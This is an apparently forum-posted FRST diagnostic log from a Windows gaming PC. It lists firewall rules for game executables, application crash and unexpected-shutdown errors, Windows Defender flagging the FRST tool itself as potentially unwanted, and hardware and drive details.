FirewallRules: [UDP Query User{34B86083-7C48-48C5-B50C-ED9D0AE94D0A}D:\program files\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Block) D:\program files\steam\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe No File
FirewallRules: [TCP Query User{0E780369-27D2-4BDB-BC34-83F3D0CAE4D6}D:\games\wolcen lords of mayhem\win_x64\wolcen.exe] => (Block) D:\games\wolcen lords of mayhem\win_x64\wolcen.exe No File
FirewallRules: [UDP Query User{809A1ABE-55A8-441F-875F-66CD3FAAB414}D:\games\wolcen lords of mayhem\win_x64\wolcen.exe] => (Block) D:\games\wolcen lords of mayhem\win_x64\wolcen.exe No File
FirewallRules: [TCP Query User{2B14AB9D-0947-4DD7-9C0B-1C0B7C41A742}D:\games\hearts of iron iv\hoi4.exe] => (Block) D:\games\hearts of iron iv\hoi4.exe No File
FirewallRules: [UDP Query User{092D6AD8-36C2-435F-8396-A730864CC86A}D:\games\hearts of iron iv\hoi4.exe] => (Block) D:\games\hearts of iron iv\hoi4.exe No File
FirewallRules: [TCP Query User{DD6A1276-8C5B-4784-A51C-16B244AA6AF5}D:\program files\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Block) D:\program files\steam\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [UDP Query User{589E3C2B-8788-4B2E-A8F5-DD566B2AD6F1}D:\program files\steam\steamapps\common\paladins\binaries\win64\paladins.exe] => (Block) D:\program files\steam\steamapps\common\paladins\binaries\win64\paladins.exe No File
FirewallRules: [TCP Query User{E0BBA607-5C59-4FA7-8BFC-280F1B49139F}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_45\bin\javaw.exe No File
FirewallRules: [UDP Query User{C9FB2236-F752-4DBB-A15D-535236124456}C:\program files\java\jre1.8.0_45\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_45\bin\javaw.exe No File
FirewallRules: [TCP Query User{D86A3E2B-8881-4CB6-94D9-BA4259473A04}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_51\bin\javaw.exe No File
FirewallRules: [UDP Query User{F2086C34-917B-4F7F-A9CB-50EED634A08B}C:\program files\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_51\bin\javaw.exe No File
FirewallRules: [TCP Query User{70A01E57-8DF8-436F-98C4-122E4EEB06BC}C:\program files\java\jre1.8.0_241\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_241\bin\javaw.exe
FirewallRules: [UDP Query User{D48D8C20-C1FB-484A-882F-A252B86B2344}C:\program files\java\jre1.8.0_241\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_241\bin\javaw.exe
FirewallRules: [TCP Query User{C736D872-A873-4829-AE27-26AABBC33C35}D:\games\call of duty - wwii\s2_sp64_ship.exe] => (Block) D:\games\call of duty - wwii\s2_sp64_ship.exe No File
FirewallRules: [UDP Query User{FE153A75-EA20-43D0-A4F4-565E9BE4D266}D:\games\call of duty - wwii\s2_sp64_ship.exe] => (Block) D:\games\call of duty - wwii\s2_sp64_ship.exe No File
FirewallRules: [TCP Query User{893AB09B-3AB4-4591-933F-42B03D4A8EBE}D:\games\call of duty - wwii\s2_mp64_ship.exe] => (Block) D:\games\call of duty - wwii\s2_mp64_ship.exe No File
FirewallRules: [UDP Query User{C278DA62-943D-4F45-8FA8-BC334072ABCE}D:\games\call of duty - wwii\s2_mp64_ship.exe] => (Block) D:\games\call of duty - wwii\s2_mp64_ship.exe No File
FirewallRules: [TCP Query User{A9FDA9A5-54DD-4180-AAA1-9073F73651A5}D:\games\call of duty modern warfare\modernwarfare.exe] => (Block) D:\games\call of duty modern warfare\modernwarfare.exe (Activision Publishing Inc -> Activision)
FirewallRules: [UDP Query User{E71D58FE-3DBA-44A6-A03C-0930E3C9C106}D:\games\call of duty modern warfare\modernwarfare.exe] => (Block) D:\games\call of duty modern warfare\modernwarfare.exe (Activision Publishing Inc -> Activision)
FirewallRules: [TCP Query User{E84DE7D9-EC52-4A58-93A4-BBB2E782F373}D:\program files\battle.net\battle.net.exe] => (Block) D:\program files\battle.net\battle.net.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [UDP Query User{ED5215C4-C3A2-4C16-A286-8267BF5D6075}D:\program files\battle.net\battle.net.exe] => (Block) D:\program files\battle.net\battle.net.exe (Blizzard Entertainment, Inc. -> Blizzard Entertainment)
FirewallRules: [TCP Query User{4E4A6559-C160-49C4-91F6-DCE9C0282971}D:\games\stellaris\stellaris.exe] => (Block) D:\games\stellaris\stellaris.exe (Paradox Interactive) [File not signed]
FirewallRules: [UDP Query User{F04E932A-5831-4314-B165-C863244A9F5A}D:\games\stellaris\stellaris.exe] => (Block) D:\games\stellaris\stellaris.exe (Paradox Interactive) [File not signed]
FirewallRules: [TCP Query User{2AABC613-EE66-4D07-B1FA-EBBCFF53C7AD}D:\games\sdgundam\gonline.exe] => (Block) D:\games\sdgundam\gonline.exe () [File not signed]
FirewallRules: [UDP Query User{AE9E55B0-F5C1-4D6A-8BB5-337C02E6333F}D:\games\sdgundam\gonline.exe] => (Block) D:\games\sdgundam\gonline.exe () [File not signed]
FirewallRules: [TCP Query User{CF08189C-E0FC-403C-B98F-C91BB000B308}D:\downloads\tixati_portable\tixati_windows64bit.exe] => (Block) D:\downloads\tixati_portable\tixati_windows64bit.exe No File
FirewallRules: [UDP Query User{678FD92E-3895-4029-A464-79023DA29B03}D:\downloads\tixati_portable\tixati_windows64bit.exe] => (Block) D:\downloads\tixati_portable\tixati_windows64bit.exe No File
FirewallRules: [{3C7B17AA-97DB-4DFC-B2CD-D8006AAE71F7}] => (Allow) C:\Program Files (x86)\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent, Inc.)
FirewallRules: [{0C5277CA-EDD6-4C6C-A4D0-182C6D19A418}] => (Allow) C:\Program Files (x86)\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent, Inc.)
FirewallRules: [TCP Query User{5DC566CA-A803-4D19-B1B5-0E4F53E39BAA}D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\bannerlord.exe] => (Block) D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\bannerlord.exe (TaleWorlds Entertainment -> ) [File not signed]
FirewallRules: [UDP Query User{EFD2F151-C25B-4597-BAA6-7BDEA6128CC0}D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\bannerlord.exe] => (Block) D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\bannerlord.exe (TaleWorlds Entertainment -> ) [File not signed]
FirewallRules: [TCP Query User{92EFE422-B9DB-4F3E-97BC-075D1D106460}D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\taleworlds.mountandblade.launcher.exe] => (Block) D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\taleworlds.mountandblade.launcher.exe (TaleWorlds Entertainment -> TaleWorlds Entertainment) [File not signed]
FirewallRules: [UDP Query User{CEDF382F-607C-4716-A039-BA6B046812AF}D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\taleworlds.mountandblade.launcher.exe] => (Block) D:\games\mount & blade ii bannerlord\bin\win64_shipping_client\taleworlds.mountandblade.launcher.exe (TaleWorlds Entertainment -> TaleWorlds Entertainment) [File not signed]
FirewallRules: [{0B0FAC5E-C836-4404-ADE6-17B95DC4FA74}] => (Allow) D:\Program Files\Steam\steamapps\common\Crusader Kings II\CK2game.exe (Paradox Interactive AB (publ) -> Paradox Interactive)
FirewallRules: [{80D5F115-BFAF-4DB0-A29F-3D084F1D21E9}] => (Allow) D:\Program Files\Steam\steamapps\common\Crusader Kings II\CK2game.exe (Paradox Interactive AB (publ) -> Paradox Interactive)
==================== Restore Points =========================
12-04-2020 05:43:03 Windows Update
==================== Faulty Device Manager Devices ============
==================== Event log errors: ========================
Application errors:
==================
Error: (04/10/2020 02:02:27 AM) (Source: Microsoft-Windows-Perflib) (EventID: 1020) (User: NT AUTHORITY)
Description: The required buffer size is greater than the buffer size passed to the Collect function of the "C:\Windows\System32\perfts.dll" Extensible Counter DLL for the "LSM" service. The given buffer size was 29040 and the required size was 31936.
Error: (04/09/2020 08:46:49 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: CK2game.exe, version: 1.0.0.0, time stamp: 0x5e3c1a6b
Faulting module name: ntdll.dll, version: 10.0.18362.719, time stamp: 0x64d10ee0
Exception code: 0xc0000374
Fault offset: 0x00000000000f92a9
Faulting process id: 0x35c4
Faulting application start time: 0x01d60e74788bfa9b
Faulting application path: D:\Program Files\Steam\steamapps\common\Crusader Kings II\CK2game.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: f51f4398-7446-47dd-add1-b8bbed37f912
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/09/2020 06:24:04 PM) (Source: VSS) (EventID: 8193) (User: )
Description: Volume Shadow Copy Service error: Unexpected error calling routine CoCreateInstance.  hr = 0x8007045b, A system shutdown is in progress.
Error: (04/09/2020 06:24:04 PM) (Source: VSS) (EventID: 13) (User: )
Description: Volume Shadow Copy Service information: The COM Server with CLSID {4e14fba2-2e22-11d1-9964-00c04fbbb345} and name CEventSystem cannot be started. [0x8007045b, A system shutdown is in progress.
Error: (04/09/2020 12:24:48 AM) (Source: Microsoft-Windows-Perflib) (EventID: 1020) (User: NT AUTHORITY)
Description: The required buffer size is greater than the buffer size passed to the Collect function of the "C:\Windows\System32\perfts.dll" Extensible Counter DLL for the "LSM" service. The given buffer size was 27992 and the required size was 30648.
Error: (04/08/2020 09:06:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: TaleWorlds.MountAndBlade.Launcher.exe, version: 1.0.0.0, time stamp: 0x5e8cab3d
Faulting module name: KERNELBASE.dll, version: 10.0.18362.719, time stamp: 0xb31987d3
Exception code: 0xe0434352
Fault offset: 0x000000000003a859
Faulting process id: 0x1748
Faulting application start time: 0x01d60daeb3bfab3a
Faulting application path: D:\Games\Mount & Blade II Bannerlord\bin\Win64_Shipping_Client\TaleWorlds.MountAndBlade.Launcher.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: 4d5f4570-79de-4acb-a9d8-606e81aaaae9
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/08/2020 09:05:00 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: TaleWorlds.MountAndBlade.Launcher.exe, version: 1.0.0.0, time stamp: 0x5e8cab3d
Faulting module name: KERNELBASE.dll, version: 10.0.18362.719, time stamp: 0xb31987d3
Exception code: 0xe0434352
Fault offset: 0x000000000003a859
Faulting process id: 0x2a58
Faulting application start time: 0x01d60dae766d4fc3
Faulting application path: D:\Games\Mount & Blade II Bannerlord\bin\Win64_Shipping_Client\TaleWorlds.MountAndBlade.Launcher.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: 19e55e0e-0e3a-4e6b-8bb6-13479fd9541a
Faulting package full name: 
Faulting package-relative application ID:
Error: (04/08/2020 09:03:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: TaleWorlds.MountAndBlade.Launcher.exe, version: 1.0.0.0, time stamp: 0x5e8cab3d
Faulting module name: KERNELBASE.dll, version: 10.0.18362.719, time stamp: 0xb31987d3
Exception code: 0xe0434352
Fault offset: 0x000000000003a859
Faulting process id: 0x1824
Faulting application start time: 0x01d60dadc5550f52
Faulting application path: D:\Games\Mount & Blade II Bannerlord\bin\Win64_Shipping_Client\TaleWorlds.MountAndBlade.Launcher.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: 2feadc5a-5c17-49af-a7d7-16090330d5b7
Faulting package full name: 
Faulting package-relative application ID:
System errors:
=============
Error: (04/12/2020 07:44:19 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Defender Antivirus Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 100 milliseconds: Run the configured recovery program.
Error: (04/12/2020 07:19:31 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 6:59:15 AM on ‎4/‎12/‎2020 was unexpected.
Error: (04/12/2020 06:43:36 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 6:35:19 AM on ‎4/‎12/‎2020 was unexpected.
Error: (04/12/2020 06:35:19 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 5:58:49 AM on ‎4/‎12/‎2020 was unexpected.
Error: (04/12/2020 05:57:25 AM) (Source: Service Control Manager) (EventID: 7043) (User: )
Description: The Update Orchestrator Service service did not shut down properly after receiving a preshutdown control.
Error: (04/12/2020 05:32:11 AM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 4:55:45 AM on ‎4/‎12/‎2020 was unexpected.
Error: (04/11/2020 09:19:47 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The LGHUB Updater Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 5000 milliseconds: Restart the service.
Error: (04/11/2020 08:00:10 PM) (Source: EventLog) (EventID: 6008) (User: )
Description: The previous system shutdown at 7:42:19 PM on ‎4/‎11/‎2020 was unexpected.
Windows Defender:
===================================
Date: 2020-04-12 07:55:15.397
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: C:\Program Files\WinRAR\WinRAR.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-12 07:54:35.808
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: C:\Windows\explorer.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-12 07:54:35.517
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: D:\Downloads\FRST.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-12 07:54:34.833
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: C:\Windows\System32\svchost.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
Date: 2020-04-12 07:54:34.475
Description: 
Windows Defender Antivirus has detected malware or other potentially unwanted software.
For more information please see the following:
Name: Program:Win32/Wacapew.C!ml
ID: 265744
Severity: Medium
Category: Potentially Unwanted Software
Path: file:_D:\Downloads\FRST.exe; webfile:_D:\Downloads\FRST.exe|about:internet|pid:10520,ProcessStart:132311260636866298
Detection Origin: Internet
Detection Type: FastPath
Detection Source: Downloads and attachments
Process Name: C:\Windows\System32\svchost.exe
Security intelligence Version: AV: 1.313.1321.0, AS: 1.313.1321.0, NIS: 1.313.1321.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
==================== Memory info =========================== 
BIOS: American Megatrends Inc. 3.50 11/07/2019
Motherboard: Micro-Star International Co., Ltd B450 TOMAHAWK MAX (MS-7C02)
Processor: AMD Ryzen 5 3600 6-Core Processor 
Percentage of memory in use: 27%
Total physical RAM: 16334.44 MB
Available physical RAM: 11863.13 MB
Total Virtual: 19022.44 MB
Available Virtual: 13526.89 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:223.57 GB) (Free:39.79 GB) NTFS
Drive d: (Local Disk) (Fixed) (Total:931.51 GB) (Free:638.82 GB) NTFS
Drive e: () (Fixed) (Total:931.51 GB) (Free:128.76 GB) NTFS ==>[system with boot components (obtained from drive)]
==================== MBR & Partition Table ====================
==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 8522A168)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)
==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: 6D9C3561)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)
==========================================================
Disk: 2 (MBR Code: Windows 7/8/10) (Size: 223.6 GB) (Disk ID: 041837E3)
Partition 1: (Not Active) - (Size=223.6 GB) - (Type=07 NTFS)
==================== End of Addition.txt =======================

Attached Files

Edited by rom1u2, Today, 09:25 PM.



https://ift.tt/2y4dRAf

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US